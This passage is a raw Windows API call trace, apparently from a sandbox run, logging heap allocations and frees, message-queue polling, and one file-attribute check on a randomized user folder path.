hFindFile=0x41ac540) returned 1 [0109.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0109.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0109.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0109.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0109.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0109.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0109.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0109.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0109.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0109.407] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0109.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0109.407] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0109.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0109.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0109.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0109.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0109.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0109.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0109.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0109.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0109.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0109.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cc1c8 | out: hHeap=0x1780000) returned 1 [0109.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0109.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0109.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0109.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0109.408] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0109.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0109.408] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0109.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0109.408] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0109.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0109.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0109.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0109.408] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0109.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0109.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0109.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0109.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28b0 [0109.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0109.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0109.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0109.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0109.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0109.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2910 [0109.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0109.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0109.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0109.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0109.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27b0 [0109.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0109.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0109.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0109.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca220 [0109.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0109.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0109.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0109.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0109.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0109.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0109.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0109.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0109.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0109.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0109.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0109.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0109.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0109.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0109.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0109.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0109.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0109.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0109.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0109.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0109.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0109.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0109.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0109.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0109.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0109.410] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0109.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0109.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0109.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0109.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0109.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0109.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0109.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0109.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0109.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0109.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0109.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0109.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0109.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0109.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0109.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0109.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0109.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0109.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0109.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0109.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0109.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0109.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0109.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0109.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0109.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0109.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0109.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0109.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0109.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0109.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0109.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0109.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0109.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0109.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0109.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0109.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0109.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0109.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0109.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0109.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0109.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0109.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0109.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0109.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0109.412] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0109.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0109.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0109.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0109.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0109.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0109.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0109.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0109.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0109.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0109.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0109.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0109.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0109.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0109.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0109.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0109.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0109.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca610 [0109.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0109.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0109.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x74) returned 0x407bc48 [0109.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0109.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0109.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0109.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0109.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0109.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0109.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0109.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0109.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0109.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0109.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0109.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0109.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0109.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0109.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0109.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0109.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0109.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0109.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0109.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0109.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0109.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0109.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0109.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0109.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0109.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf0) returned 0x4314d10 [0109.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x407bc48 | out: hHeap=0x1780000) returned 1 [0109.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0109.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0109.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0109.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0109.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0109.415] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0109.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0109.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0109.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0109.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0109.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0109.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0109.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0109.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0109.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0109.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0109.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0109.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0109.415] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0109.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0109.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0109.415] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0109.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0109.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0109.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0109.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0109.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0109.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0109.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0109.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0109.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0109.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0109.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0109.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0109.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0109.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0109.416] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0109.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0109.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0109.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0109.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0109.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0109.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0109.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0109.417] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\tr4gqm")) returned 0x10 [0109.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0109.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0109.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0109.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0109.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0109.417] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0109.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0109.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0109.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0109.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0109.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0109.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0109.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0109.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0109.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0109.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0109.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0109.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0109.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca598 [0109.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0109.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0109.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 